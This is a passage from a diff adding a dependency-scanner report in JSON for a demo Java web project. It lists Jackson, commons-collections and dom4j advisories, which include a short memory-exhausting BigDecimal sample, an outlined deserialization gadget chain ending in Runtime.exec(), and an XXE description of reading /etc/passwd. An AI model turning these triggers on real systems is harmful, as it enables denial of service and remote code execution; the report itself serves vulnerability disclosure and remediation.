], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mx9v-gmh4-mgqw" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-01-03T14:17:31.715185Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-01-02T19:18:43Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 
"com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-01-03T17:01:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:22.091904Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31519", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Alessio Soldano" + ], + "semver": { + "vulnerable": [ + "[,2.8.6)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.8.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/UTF8StreamJsonParser.java", + "className": "UTF8StreamJsonParser", + "functionName": "_reportInvalidToken" + } + }, + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/ReaderBasedJsonParser.java", + "className": "ReaderBasedJsonParser", + "functionName": "_reportInvalidToken" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-core", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-core/pull/322", + "title": "GitHub PR" + }, + { + "url": "https://issues.jboss.org/browse/JBEAP-6316", + "title": "Jira Issue" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + 
"assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:01.546686Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). If the REST endpoint consumes POST requests with JSON or XML data and data are invalid, the first unrecognized token is printed to server.log\r\n> If the first token is word of length 10MB, the whole word is printed. This is potentially dangerous and can be used to attack the server by filling the disk with logs.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.8.6 or higher.\n## References\n- [GitHub PR](https://github.com/FasterXML/jackson-core/pull/322)\n- [Jira Issue](https://issues.jboss.org/browse/JBEAP-6316)\n", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-399" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-core", + "proprietary": false, + "creationTime": "2017-09-20T15:28:35.195000Z", + "functions_new": [ + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.UTF8StreamJsonParser", + "functionName": "_reportInvalidToken" + } + }, + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.ReaderBasedJsonParser", + "functionName": "_reportInvalidToken" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-01-12T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-core" + }, + "publicationTime": "2017-09-20T15:28:35Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T13:58:01.546686Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-core@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-core", + "version": "2.6.5", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31520", + "title": 
"Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "gmethwin@github" + ], + "semver": { + "vulnerable": [ + "[2.3.0-rc1,2.7.7)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.7.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/UTF8JsonGenerator.java", + "className": "UTF8JsonGenerator", + "functionName": "writeNumber" + } + }, + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/WriterBasedJsonGenerator.java", + "className": "WriterBasedJsonGenerator", + "functionName": "writeNumber" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-core", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-core/commit/96642978dcf1b69cba68ec72cb2f652d59a8b5be", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-core/issues/315", + "title": "GitHub Issue" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:48.004490Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). 
When `WRITE_BIGDECIMAL_AS_PLAIN` setting is enabled, Jackson will attempt to write out the whole number, no matter how large the exponent.\r\nThe following sample code will trigger an out of memory exception:\r\n```java\r\nObjectMapper mapper = new ObjectMapper().enable(JsonGenerator.Feature.WRITE_BIGDECIMAL_AS_PLAIN);\r\nmapper.writeValueAsString(new java.math.BigDecimal(\"9.223372E+1010671858\"));\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.7.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-core/commit/96642978dcf1b69cba68ec72cb2f652d59a8b5be)\n- [GitHub Issue](https://github.com/FasterXML/jackson-core/issues/315)\n", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-399" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-core", + "proprietary": false, + "creationTime": "2017-09-20T15:28:35.195000Z", + "functions_new": [ + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.UTF8JsonGenerator", + "functionName": "writeNumber" + } + }, + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.WriterBasedJsonGenerator", + "functionName": "writeNumber" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2016-08-25T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-core" + }, + "publicationTime": "2017-09-20T15:28:35Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T13:55:48.004490Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-core@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-core", + "version": "2.6.5", + "severityWithCritical": "medium" + }, + { + "id": 
"SNYK-JAVA-COMMONSCOLLECTIONS-472711", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,3.2.2)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "3.2.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.6, + "functions": [ + { + "version": [ + "[3.1, 3.22)", + "[,3.0-dev2)" + ], + "functionId": { + "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", + "className": "InvokerTransformer", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-collections:commons-collections", + "references": [ + { + "url": "https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/commons-collections/pull/18", + "title": "GitHub PR" + }, + { + "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", + "title": "Jira Ticket" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:52:35.761152Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:34.698666Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:35.761152Z" + } + ], + "description": "## 
Overview\n\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data.\nVersions of commons-collections prior to `3.2.2` do not prevent deserialization of the class `org.apache.commons.collections.functors.InvokerTransformer`. This could be leveraged by an attacker as a gadget within a vulnerable application which deserializes user input to execute arbitrary code. \r\n\r\nVersions of commons-collections from 3.2.2 onwards will throw an `UnsupportedOperationException` error when attempts are made to deserialize InvokerTransformer instances to prevent potential remote code execution exploits.\r\n\r\n*Note:* `org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4` we recommend moving to the new artifact if possible.\r\n\r\n## PoC \r\n\r\n```\r\n/*\r\n\tGadget chain:\r\n\t\tObjectInputStream.readObject()\r\n\t\t\tAnnotationInvocationHandler.readObject()\r\n\t\t\t\tMap(Proxy).entrySet()\r\n\t\t\t\t\tAnnotationInvocationHandler.invoke()\r\n\t\t\t\t\t\tLazyMap.get()\r\n\t\t\t\t\t\t\tChainedTransformer.transform()\r\n\t\t\t\t\t\t\t\tConstantTransformer.transform()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tClass.getMethod()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.getRuntime()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.exec()\r\n\tRequires:\r\n\t\tcommons-collections\r\n */\r\n```\n\n## Details\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\r\n\r\n \r\n\r\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\r\n\r\n \r\n\r\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\r\n\r\n \r\n\r\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\r\n\r\n \r\n\r\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. 
So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\r\n\r\n- Apache Blog\r\n\r\n \r\n\r\nThe vulnerability, also know as _Mad Gadget_\r\n\r\n> Mad Gadget is one of the most pernicious vulnerabilities we’ve seen. By merely existing on the Java classpath, seven “gadget” classes in Apache Commons Collections (versions 3.0, 3.1, 3.2, 3.2.1, and 4.0) make object deserialization for the entire JVM process Turing complete with an exec function. Since many business applications use object deserialization to send messages across the network, it would be like hiring a bank teller who was trained to hand over all the money in the vault if asked to do so politely, and then entrusting that teller with the key. 
The only thing that would keep a bank safe in such a circumstance is that most people wouldn’t consider asking such a question.\r\n\r\n- Google\n\n\n## Remediation\n\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n\n\n## References\n\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee)\n\n- [GitHub PR](https://github.com/apache/commons-collections/pull/18)\n\n- [Jira Ticket](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n", + "epssDetails": { + "percentile": "0.82603", + "probability": "0.00880", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-6420" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6hgm-866r-3cjv" + ] + }, + "packageName": "commons-collections:commons-collections", + "proprietary": false, + "creationTime": "2019-10-10T18:31:03.943542Z", + "functions_new": [ + { + "version": [ + "[3.1, 3.22)", + "[,3.0-dev2)" + ], + "functionId": { + "className": "org.apache.commons.collections.functors.InvokerTransformer", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-10T00:00:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-collections", + "artifactId": "commons-collections" + }, + "publicationTime": "2020-02-24T00:00:00Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:35.761152Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "commons-collections:commons-collections@3.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + 
"isPinnable": false, + "isRuntime": false, + "name": "commons-collections:commons-collections", + "version": "3.1", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-DOM4J-174153", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", + "credit": [ + "Mario Areias" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[0,]" + ], + "functionId": { + "filePath": "org/dom4j/Namespace.java", + "className": "Namespace", + "functionName": "" + } + }, + { + "version": [ + "[0,]" + ], + "functionId": { + "filePath": "org/dom4j/QName.java", + "className": "QName", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "dom4j:dom4j", + "references": [ + { + "url": "https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/dom4j/dom4j/issues/48", + "title": "GitHub Issue" + }, + { + "url": "https://ihacktoprotect.com/post/dom4j-xml-injection/", + "title": "POC: Ihacktoprotect Blog" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", + "cvssV3BaseScore": 6.1, + "modificationTime": "2024-03-11T09:46:26.800032Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:19.987177Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:53:54.900402Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:00:55.789489Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", + "assigner": "SUSE", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:26.800032Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:19.987177Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.900402Z" + } + ], + "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection due to improper validation of the `QName` inputs.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. 
When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387)\n- [GitHub Issue](https://github.com/dom4j/dom4j/issues/48)\n- [POC: Ihacktoprotect Blog](https://ihacktoprotect.com/post/dom4j-xml-injection/)\n", + "epssDetails": { + "percentile": "0.70906", + "probability": "0.00325", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-1000632" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-6pcc-3rfx-4gpm" + ] + }, + "packageName": "dom4j:dom4j", + "proprietary": false, + "creationTime": "2019-04-10T16:07:04.634619Z", + "functions_new": [ + { + "version": [ + "[0,]" + ], + "functionId": { + "className": "org.dom4j.Namespace", + "functionName": "" + } + }, + { + "version": [ + "[0,]" + ], + "functionId": { + "className": "org.dom4j.QName", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-01T19:12:29Z", + "exploitDetails": { + "sources": [ + "Snyk" + 
], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "dom4j", + "artifactId": "dom4j" + }, + "publicationTime": "2018-08-21T14:16:13Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.900402Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "dom4j:dom4j@1.6.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "dom4j:dom4j", + "version": "1.6.1", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-DOM4J-2812975", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.4, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "dom4j:dom4j", + "references": [ + { + "url": "https://github.com/dom4j/dom4j/commit/a822852", + "title": "GitHub Commit" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:50:18.813214Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + 
"cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:53:57.985080Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:31.083245Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:18.813214Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:57.985080Z" + } + ], + "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. By using the default `SaxReader()` provided by Dom4J, external DTDs and External Entities are allowed, resulting in a possible XXE.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. 
When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/a822852)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1694235)\n", + "epssDetails": { + "percentile": "0.79800", + "probability": "0.00664", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10683" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-hwj3-m3p6-hj38" + ] + }, + "packageName": "dom4j:dom4j", + "proprietary": false, + "creationTime": "2022-05-10T12:56:27.582369Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2020-04-15T09:38:17Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "dom4j", + "artifactId": "dom4j" + }, + "publicationTime": "2020-04-16T15:22:50Z", + 
